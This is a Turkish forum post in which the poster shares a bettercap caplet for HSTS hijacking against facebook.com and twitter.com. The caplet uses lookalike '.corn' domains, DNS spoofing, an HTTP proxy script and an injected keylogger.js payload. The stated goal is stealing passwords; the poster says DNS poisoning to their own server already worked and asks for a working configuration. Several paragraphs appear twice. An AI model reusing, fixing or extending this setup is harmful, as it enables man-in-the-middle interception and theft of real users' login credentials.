Selamlar. Ben bettercap kullanıyorum. Onda bir https kırmak için bir cap dosyası var.
Benim cap dosyamın kodları bu. Ama ne yaparsam yapayım başka siteler de deniyorum linkedin gibi HTTPS i kırmıyor.
EDİT: JS KODU KULLANMADAN ATMIŞIM AMA NORMALDE İNTERNET DEN BİR JAVA SCRİPT KOD ALDIM ÖYLE DE DENEDİM OLMADI. SİZİNKİ ÇALIŞIYORSA ATABİLİRMİSİNİZ CAP DOSYASINI.
NOT: MITM FRAMEWORK aracı da maalesef ki hata veriyor. Gerekli modulu kurmama rağmen hata alıyorum çözümü bilen varsa buna da cevap verilebilir. Teşekkürler.
Ya şimdi yapmak istediğim olay DNS Zehirlemesi ile de yapılır yani kişiyi farklı bir kendi sunucuma yöneltip de şifreleri alırım. Bu DNS Spoofing i denedim başarılı çalıştı ama birde Bettercap üzerinden https kırma ile şifreleri almak istiyorum o da pratikde olsun.
Kod:
# ********ation can be found at https://github.com/bettercap/blob/master/hstshijack/README.md
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets facebook.com, *.facebook.com, *.twitter.com
set hstshijack.replacements facebook.corn, *.facebook.corn,*.twitter.corn
#set hstshijack.blockscripts facebook.com,*.facebook.com
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js
set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains facebook.corn, *.facebook.corn,*.twitter.corn
http.proxy on
dns.spoof on
Benim cap dosyamın kodları bu. Ama ne yaparsam yapayım başka siteler de deniyorum linkedin gibi HTTPS i kırmıyor.
EDİT: JS KODU KULLANMADAN ATMIŞIM AMA NORMALDE İNTERNET DEN BİR JAVA SCRİPT KOD ALDIM ÖYLE DE DENEDİM OLMADI. SİZİNKİ ÇALIŞIYORSA ATABİLİRMİSİNİZ CAP DOSYASINI.
NOT: MITM FRAMEWORK aracı da maalesef ki hata veriyor. Gerekli modulu kurmama rağmen hata alıyorum çözümü bilen varsa buna da cevap verilebilir. Teşekkürler.
Ya şimdi yapmak istediğim olay DNS Zehirlemesi ile de yapılır yani kişiyi farklı bir kendi sunucuma yöneltip de şifreleri alırım. Bu DNS Spoofing i denedim başarılı çalıştı ama birde Bettercap üzerinden https kırma ile şifreleri almak istiyorum o da pratikde olsun.
Moderatör tarafında düzenlendi: